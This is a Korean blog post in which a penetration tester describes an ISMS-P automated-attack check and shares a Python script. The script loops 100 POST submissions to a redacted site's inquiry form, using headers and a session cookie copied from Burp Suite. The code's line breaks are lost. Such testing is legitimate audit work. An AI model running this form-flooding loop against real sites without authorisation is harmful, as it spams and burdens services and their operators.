Python Http POST요청 자동화 코드
ISMS-P(정보보호 및 개인정보보호관리체계)인증을 충족하기 위해 웹 모의 해킹을 진행했던 경험이 있습니다. 이 ISMS-P 검사 항목중에 자동화 공격에 대한 진단 항목이 있습니다. 이 항목을 진단할때 python코드를 작성해 반복문으로 POST요청을 다량으로 발생시켜 공격을 시도 했습니다. 이에 관련된 코드를 올려봅니다. 단순히 while문으로 반복적인 요청을 보내는 코드입니다. import urllib.parse import urllib.request a = 1 while(a <= 100): #웹 POST요청에 대한 파라미터들을 json형식으로 정의해 줍니다. details = urllib.parse.urlencode({'mm':'voc', 'sm':'ins', 'pg':'1', 'regCd':'', 'regName':'', 'Title':'취약점 점검중', 'WriterName':'yunjoker', 'Tel1':'123', 'Tel2':'123', 'Tel3':'123', 'EmailId':'123', 'EmailDomain':'naver.com', 'agree1':'1', 'Content':'ㅁㄴㅇㄹ'}) #인코딩 유형을 설정합니다 details = details.encode('UTF-8') #요청 URL을 추가합니다 url = urllib.request.Request("https://***/common/process/process.inquiry.php", details) #Burp Suite 등의 프로그램이나 기능을 이용해 쿠키값들을 그대로 헤더에 추가해 줍니다. url.add_header("POST", "/common/process/process.inquiry.php HTTP/1.1") url.add_header("Host", "***") url.add_header("Connection", "close") url.add_header("Content-Length", "360") url.add_header("Accept", "application/json, text/javascript, */*; q=0.01") url.add_header("X-Requested-With", "XMLHttpRequest") url.add_header("User-Agent", "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36") url.add_header("Sec-Fetch-Mode", "cors") url.add_header("Content-Type", "application/x-www-form-urlencoded") url.add_header("Sec-Fetch-Site", "same-origin") url.add_header("Referer", "***") url.add_header("Accept-Encoding", "gzip, deflate") url.add_header("Accept-Language", "ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7") url.add_header("Cookie", "_ga=GA1.2.1167119943.1572314702; _gid=GA1.2.304601219.1572314702; PHPSESSID=n07lta0bu412bcsk0q9jejvoh7; _gat_gtag_UA_74704901_2=1") #POST요청 후 리스폰스 데이터를 ResponseData 변수에 저장합니다. ResponseData = urllib.request.urlopen(url).read().decode("utf-8") #리스폰스 데이터를 출력합니다 print(ResponseData) a = a+1